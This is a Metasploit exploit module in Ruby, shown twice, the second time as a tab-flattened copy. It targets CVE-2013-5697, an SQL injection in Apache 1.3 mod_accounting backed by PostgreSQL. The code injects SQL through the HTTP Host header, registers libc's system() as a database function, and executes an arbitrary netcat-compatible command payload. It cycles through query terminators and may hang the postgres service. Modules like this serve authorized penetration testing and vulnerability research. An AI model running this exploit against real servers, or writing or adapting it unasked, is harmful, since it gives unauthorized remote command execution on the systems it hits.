bcoles/apache_modaccouting_postgresql_injection.rb

## apache_modaccouting_postgresql_injection.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Apache mod_accounting SQL Injection Command Execution',
      'Description'    => %q{
        This module exploits an SQL injection vulnerability in the
        mod_accounting module for Apache 1.3 when configured to use PostgreSQL.

        This module uses SQL injection in the HTTP 'Host' header to execute
        arbitrary commands as the database user.

        This module has been tested successfully on Apache 1.3.33 on Debian
        3.1r8 Sarge with PostgreSQL 7.4.7. Note repeated use of this module may
        cause the postgres service to become unresponsive due to a large number
        of hung threads.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Wireghoul', # Initial discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['EDB',   '28653'],
          ['OSVDB', '97588'],
          ['CVE',   '2013-5697']
        ],
      'Payload'        =>
        {
          'DisableNops'=> true,
          'Space'      => 126, # 256 bytes - sql query terminator (<4 bytes) - system declaration (122 bytes) - sql comment (4 bytes)
          'BadChars'   => "\x00\x27",
          'Compat'     =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat netcat-e'
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          # Tested on Debian Sarge 3.1r8 Apache/1.3.33 mod_accounting/0.5
          ['Automatic', { 'auto' => true } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Sep 30 2013',
      'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(80)
      ], self)
    deregister_options('VHOST')
  end

  #
  # Check
  #
  def check
    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
    if !res
      vprint_error("#{peer} - Connection failed.")
      Exploit::CheckCode::Unknown
    elsif res.headers['server'] =~ /mod_accounting\/([\d\.]+)/
      vprint_good("#{peer} - Found mod_accounting version #{$1}")
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  #
  # Execute a command
  #
  def send_request(terminator)
    vprint_status("Attempting to terminate query with: #{terminator}")
    max_len = 256
    vhost = "#{terminator}CREATE OR REPLACE FUNCTION system(cstring)"
    vhost << " RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT;"
    vhost << "SELECT system('#{payload.encoded}'); -- "
    vprint_status("Sending payload (#{vhost.length} bytes)")
    print_warning("Request is larger than #{max_len} bytes and will be truncated") if vhost.length > max_len
    send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'vhost' => vhost })
  end

  #
  # Exploit
  #
  def exploit
    handler
    terminators = [
      "'));",
      '"));',
      '));',
      "');",
      '");',
      ');',
      "';",
      '";',
      ';'
    ]
    terminators.shuffle.each_with_index do |terminator, index|
      res = send_request(terminator)
      fail_with(Failure::Unreachable, "#{peer} - Connection failed.") unless res
      vprint_status("#{peer} - Received reply [#{res.code}] (#{res.body.length} bytes)") if res.body
      progress(index + 1, terminators.size)
    end
  end

  #
  # Show progress percentage
  #
  def progress(current, total)
    done = (current.to_f / total.to_f) * 100
    percent = "%3.2f%%" % done.to_f
    vprint_status("#{peer} - Injecting payload - %7s done (%d/%d)" % [percent, current, total])
  end

end
	##
	# This module requires Metasploit: http://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
	super(update_info(
	info,
	'Name' => 'Apache mod_accounting SQL Injection Command Execution',
	'Description' => %q{
	This module exploits an SQL injection vulnerability in the
	mod_accounting module for Apache 1.3 when configured to use PostgreSQL.

	This module uses SQL injection in the HTTP 'Host' header to execute
	arbitrary commands as the database user.

	This module has been tested successfully on Apache 1.3.33 on Debian
	3.1r8 Sarge with PostgreSQL 7.4.7. Note repeated use of this module may
	cause the postgres service to become unresponsive due to a large number
	of hung threads.
	},
	'License' => MSF_LICENSE,
	'Author' =>
	[
	'Wireghoul', # Initial discovery and PoC
	'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
	],
	'References' =>
	[
	['EDB', '28653'],
	['OSVDB', '97588'],
	['CVE', '2013-5697']
	],
	'Payload' =>
	{
	'DisableNops'=> true,
	'Space' => 126, # 256 bytes - sql query terminator (<4 bytes) - system declaration (122 bytes) - sql comment (4 bytes)
	'BadChars' => "\x00\x27",
	'Compat' =>
	{
	'PayloadType' => 'cmd',
	'RequiredCmd' => 'netcat netcat-e'
	}
	},
	'Platform' => 'unix',
	'Arch' => ARCH_CMD,
	'Targets' =>
	[
	# Tested on Debian Sarge 3.1r8 Apache/1.3.33 mod_accounting/0.5
	['Automatic', { 'auto' => true } ]
	],
	'Privileged' => false,
	'DisclosureDate' => 'Sep 30 2013',
	'DefaultTarget' => 0))
	register_options(
	[
	Opt::RPORT(80)
	], self)
	deregister_options('VHOST')
	end

	#
	# Check
	#
	def check
	res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
	if !res
	vprint_error("#{peer} - Connection failed.")
	Exploit::CheckCode::Unknown
	elsif res.headers['server'] =~ /mod_accounting\/([\d\.]+)/
	vprint_good("#{peer} - Found mod_accounting version #{$1}")
	Exploit::CheckCode::Detected
	else
	Exploit::CheckCode::Safe
	end
	end

	#
	# Execute a command
	#
	def send_request(terminator)
	vprint_status("Attempting to terminate query with: #{terminator}")
	max_len = 256
	vhost = "#{terminator}CREATE OR REPLACE FUNCTION system(cstring)"
	vhost << " RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT;"
	vhost << "SELECT system('#{payload.encoded}'); -- "
	vprint_status("Sending payload (#{vhost.length} bytes)")
	print_warning("Request is larger than #{max_len} bytes and will be truncated") if vhost.length > max_len
	send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'vhost' => vhost })
	end

	#
	# Exploit
	#
	def exploit
	handler
	terminators = [
	"'));",
	'"));',
	'));',
	"');",
	'");',
	');',
	"';",
	'";',
	';'
	]
	terminators.shuffle.each_with_index do \|terminator, index\|
	res = send_request(terminator)
	fail_with(Failure::Unreachable, "#{peer} - Connection failed.") unless res
	vprint_status("#{peer} - Received reply [#{res.code}] (#{res.body.length} bytes)") if res.body
	progress(index + 1, terminators.size)
	end
	end

	#
	# Show progress percentage
	#
	def progress(current, total)
	done = (current.to_f / total.to_f) * 100
	percent = "%3.2f%%" % done.to_f
	vprint_status("#{peer} - Injecting payload - %7s done (%d/%d)" % [percent, current, total])
	end

	end